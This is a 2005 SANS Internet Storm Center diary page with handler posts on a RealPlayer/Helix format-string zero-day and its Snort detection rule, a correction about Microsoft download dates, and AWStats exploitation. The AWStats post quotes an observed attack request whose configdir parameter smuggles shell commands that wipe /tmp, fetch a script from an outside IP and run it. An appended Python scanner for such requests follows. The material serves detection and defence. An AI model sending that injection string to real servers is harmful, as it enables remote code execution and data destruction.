Threat Level: green Handler on Duty: Jim Clausing

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-09-27



Possible New Zero-Day Exploit for Realplayer

Published: 2005-09-27
Last Updated: 2005-09-27 18:16:19 UTC
by Lorna Hutcheson (Version: 2)
FrSIRT is reporting a zero-day exploit against the client-side RealPlayer and Helix Player.  The exploit takes advantage of a format string error that can be exploited using specially crafted ".rp" (RealPix) or ".rt" (RealText) files.  The affected versions are:

Helix Player 1.0.5 Gold and prior (Linux)
RealPlayer 10.0.5 Gold and prior (Linux)


There is no known fix at this time. 
http://service.real.com/help/faq/security/ has not posted information on this yet. 

Blake Hartstein from demarc.com posted the following to Bleeding-Snort yesterday, which should provide coverage for this issue:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"BLEEDING-EDGE RealPlayer/Helix Player Format String Exploit";
flow:established,from_server; content:"
pcre:"/
]*handle=[^>]*%[^>]*%/iRG";
reference:url,milw0rm.com/id.php?id=1232; reference:bugtraq,14945;
sid:2002381; rev:1;)
Stay tuned for further updates as we have them.


Errata, Mea Culpa, "latest" "Date released" and "Date Published"

Published: 2005-09-27
Last Updated: 2005-09-27 18:14:23 UTC
by Patrick Nolan (Version: 1)
The Handlers Diary of September 24th 2005 concerning IE 6 SP1 and Direct X downloads (Published: 2005-09-24, Last Updated: 2005-09-24 22:37:53 UTC by Adrien de Beaupre, Version: 1) was a result of my reporting what MS describes as the "latest" "Published" security updates to Adrien. After he was kind enough to post what I thought was new MS security information, I remembered that I had once before made the mistake of interpreting Microsoft information as indicating new when in fact they were not just "Published" or not just "released". Unfortunately I didn't jump through to the digital signatures to determine the actual dates issued. So Adrien, I apologize for sending in un-vetted information that caused you and some readers problems. And I thank the Diary readers who took the time to determine the actual dates issued and point out the errors to me.

"Release date" and "Date Published" and "latest" as used by MS on their "Download Center" and as a result of going through their "Microsoft Download Notifications" email service are useless in determining currency. Take the additional steps and check the digital signature dates and research some more and you'll know if they're needed in your environment.

Reader clue Submission;

We had some posts pointing out that these were not "new" items, one submission (they requested anonymity) said it best;

"1. the ie6sp1 for non-xp sp2 systems that you say it is new..the file date&time it may well be, but the digital signature date for the file that i downloaded from that link says it was signed on May 3rd 2004 !!! so its an old one.

Maybe the file date was modified on the download server, but the  says otherwise.

2. same with the dx8 file.. this one is even older

the digital signature says it was created on August 8th 2003, even older!

please check the digital signatures in the future before posting announcements."


Thank you "anonymous", next time I'll be sure to remember that.

Exculpatory information

The Microsoft Download Center's "Release Date" for the Diary items said;

"Internet Explorer 6 Service Pack 1 Release date 9/21/2005" and "Security Fix for DirectX 8 (KB819696) Release date 9/22/2005".

When you click the download link for the details of each Download Center item, the download "Date Published" information says;

"Internet Explorer 6 Service Pack 1 Date Published:  9/22/2005" and goes on to say:
"Quick Description:
Internet Explorer 6 is the set of core Web browsing technologies in Windows XP. These core technologies have recently been updated as part of Windows XP Service Pack 2 (SP2) with Advanced Security Technologies". And I assumed (I know ....) that MS had updated IE running on XPSP1 with IEXPSP2 security technology.... No other clueful information there.

Moving on, the "Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98 (KB819696)" says "Date Published:  9/22/2005". Again, there's no other clueful information there.

On "Latest" and "Published"

In addition, when you receive the "Microsoft Download Notifications" email service (in this case September 23, 2005) and click its links for the "latest" you get the same date items as above. The "Notifications" email is "a free weekly mailing that provides you with the latest drivers, trial software, service packs, and other downloads from the Microsoft Download Center. Listed below are downloads published in the Download Center in the past week, in the categories that you have chosen*".

In summary "Date released", "Date Published" and "latest" have nothing to do with currency.

I did contact MS about this but I'm having problems understanding where to go from here. Encyclopedia? Susan Bradley, ( ; ^ ) Susan!

Other;

"Release date" use;
"Earnings Release Date Set"
http://moneycentral.msn.com/investor/alerts/glossary.asp?TermID=2

"Date Published"
http://www.cgpublisher.com/CGOntology/CGDatePublished

Patrick Nolan ( ; ^ )

New Handler Pages Are Here!

Published: 2005-09-27
Last Updated: 2005-09-27 04:17:46 UTC
by Lorna Hutcheson (Version: 1)
If you ever wondered what the handlers were all about and who we were as "real" folks, then this is something that you might enjoy.  We have a new section coming up where the handlers will each have their own web page.  Here you can find more information on the handlers themselves and on security issues and topics they feel are important.  The first handler to have theirs completed is Pedro Bueno.  So if you have time, check out the first site and meet Pedro!  He is starting a great section on malware analysis.  Go grab yourself a cup of coffee and enjoy!

AWSTATS

Published: 2005-09-27
Last Updated: 2005-09-27 04:07:39 UTC
by Lorna Hutcheson (Version: 1)
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  It's all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.
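
A log check for the request pattern reported above, added here as an example and not part of the original diary: it flags awstats.pl requests whose configdir parameter decodes to shell metacharacters. The access-log layout, the function names and the sample lines (documentation addresses, harmless payload) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line inside an access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a parameter value break out into a shell command
SHELL_META = re.compile(r"[|;`&<>]|\$\(")

def decode(value, rounds=3):
    """Percent-decode repeatedly so %7C and %257C both end up as '|'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def awstats_configdir_injection(line):
    """Return the decoded configdir value if it carries shell metacharacters, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # "//awstats.pl" and "/cgi-bin/awstats.pl" should both match
    if not decode(path).lower().endswith("/awstats.pl"):
        return None
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if decode(key).lower() == "configdir":
            value = decode(raw)
            if SHELL_META.search(value):
                return value
    return None

# Constructed sample log lines, not taken from any real server
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2005:04:01:12 +0000] "GET //awstats.pl?configdir=|echo%20;id;echo| HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Sep/2005:04:02:40 +0000] "GET /cgi-bin/awstats.pl?config=example.org&configdir=%7Cid%7C HTTP/1.0" 404 208',
    '192.0.2.12 - - [27/Sep/2005:04:03:05 +0000] "GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 9321',
]

def scan(lines):
    """Return (source address, decoded configdir) for every flagged line."""
    hits = [(line.split()[0], awstats_configdir_injection(line)) for line in lines]
    return [(src, value) for src, value in hits if value is not None]

if __name__ == "__main__":
    for src, value in scan(SAMPLE_LOG):
        print(f"{src}: configdir={value!r}")
```

The HTTP status on a flagged line shows only that the request was answered, so a hit still needs a check of the AWStats version and of /tmp on the host before it is written off as a failed attempt.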


